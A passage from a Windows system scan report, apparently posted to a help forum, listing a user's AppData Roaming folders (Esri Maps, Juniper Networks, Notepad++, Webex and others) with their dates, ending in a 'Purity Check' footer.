C:\Users\dkoloszc\AppData\Roaming\Esri Maps [2014-11-15 16:05:18 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Juniper Networks [2014-12-02 09:38:02 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\JWrapper-RecordableActivator [2014-02-06 15:36:21 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\LogSys [2014-05-28 15:57:36 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Netscape [2014-02-25 16:07:29 | 000,000,000 | ---D | M] -- 
C:\Users\dkoloszc\AppData\Roaming\Notepad++ [2014-05-07 10:35:57 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\PDAppFlex [2014-02-04 13:34:08 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Pencil [2014-05-28 15:56:47 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Photodex [2014-10-01 14:40:35 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Rsupport [2014-09-29 12:29:42 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Samsung [2014-12-05 11:57:12 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Syncios [2014-02-07 09:37:50 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\TechSmith [2014-12-15 14:49:36 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Webex [2014-05-28 15:45:55 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Zoner [color=#E56717]========== Purity Check ==========[/color] < End of report >